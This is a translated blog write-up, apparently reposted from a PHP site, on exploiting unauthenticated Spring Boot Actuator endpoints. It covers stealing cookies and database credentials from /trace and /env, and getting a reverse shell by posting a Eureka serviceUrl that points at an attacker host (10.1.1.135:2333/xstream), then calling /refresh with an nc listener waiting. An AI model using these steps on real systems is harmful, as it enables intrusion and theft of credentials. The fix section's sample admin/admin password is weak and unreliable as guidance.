Example analysis of Spring Boot Actuator's unauthorized access to getshell

Preface

The department boss dug this vulnerability in a certain src. It is an old hole. I thought it was interesting, so I set up a local environment to test it.

Actuator is a functional module provided by springboot for introspection and monitoring of application systems. With the help of Actuator, developers can easily view and collect statistics on certain monitoring indicators of the application system. When Actuator is enabled, if relevant permissions are not controlled, illegal users can obtain monitoring information in the application system by accessing the default actuator endpoints, leading to information leakage or even server takeover.

Actuator is a functional module provided by Spring Boot, which can be used for introspection and monitoring of application systems. The provided executor endpoints are divided into two categories: native endpoints and user-defined extension endpoints. The native endpoints mainly include:

utilization ideas

1. Use env plus refresh to perform getshell
   

2. Use mappings to find unauthorized interfaces
   

3. Use trace to obtain authentication information (Cookie, Tooken, Session), and use the authentication information to access the interface.
   

4. env may leak the database account password (mangodb). Of course, the external network must be opened, so the possibility is small.
   

5. Foreigners say that sql statements can be executed, but I don’t understand it yet
   

Vulnerability discovery

Usually identify the framework used by the current web application as the springboot framework. There are two main ways to judge:

1. Through the icon of the web application web page label (favicon.ico); if the web application developer has not modified the default icon of the springboot web application, then enter the application After the home page, you can see the following default green small icon:
   

1. ##The default error page is reported through the springboot framework; if The web application developer has not modified the default 4xx and 5xx error pages of the springboot web application. Then when a 4xx or 5xx error occurs in the web application, the following error will be reported (only the 404 error page is used as an example here): Access a randomly constructed path , for example: http://172.26.2.24:8090/index. If the following error page appears, it means that the web website uses the springboot framework (most of the situations encountered in practice are like this).

   
   

Combining the above two ways to determine whether the current web application is a springboot framework is to access different directories to see if there are any small Green leaf icon, and then find a way to trigger the 4xx or 5xx error of the application in different directories to see if there is a Whitelabel Error Page error.

Exploiting the vulnerability

Access the /trace endpoint to obtain basic HTTP request tracking information (timestamp, HTTP header, etc.). If there is an operation request from a logged-in user, you can forge cookies to log in.

Access the /env endpoint to obtain all environment attributes. Since the actuator will monitor database services such as mysql and mangodb on the site, sometimes mysql and mangodb database information can be obtained through monitoring information. If the database happens to be open on the public network, the harm caused is huge.

/env endpoint is improperly configured to cause RCE.

Prerequisite: Eureka -Client For example, when testing the frontend json error report and leaking the package name, use netflix

The following two are required Package

spring-boot-starter-actuator (/refresh refresh configuration required)

spring-cloud-starter-netflix-eureka-client (functional dependency)

Use python3 When starting the script, you need to pay attention to two places, one is the ip and port for receiving the shell, and the other is the port for our script to start,

Nc listens to a port to receive the rebound shell,

Write the configuration, access the /env endpoint, capture the packet and change the get request to a post request. The post content is (the ip is the ip of the machine started by the script) ：

eureka.client.serviceUrl.defaultZone=http://10.1.1.135:2333/xstream

Then visit /refresh, capture the packet and change the get request to Post request, post data is arbitrary,

# Then in our nc window you can see that a shell has been successfully bounced back.

Vulnerability Repair

As a security dog, you can’t just dig without fixing, introduce spring-boot under the project’s pom.xml file -starter-security depends on

<dependency>
	<groupid>org.springframework.boot</groupid><artifactid>spring-boot-starter-security</artifactid>
</dependency>

Then enable the security function in application.properties, configure the access account password, and restart the application to pop up.

management.security.enabled=true
security.user.name=admin
security.user.password=admin

To disable the interface, you can set it as follows (such as disabling the env interface):

endpoints.env.enabled = false

Question

Foreigners said that they can execute sql statements but found that they could not be executed. Maybe the method is not correct. I took a screenshot of his picture. I hope someone who can successfully execute it can share it. .

In the actual environment, it is found that there are many no refreshes, resulting in the inability to execute the command. There is no breakthrough yet

The above is the detailed content of Example analysis of Spring Boot Actuator's unauthorized access to getshell. For more information, please follow other related articles on the PHP Chinese website!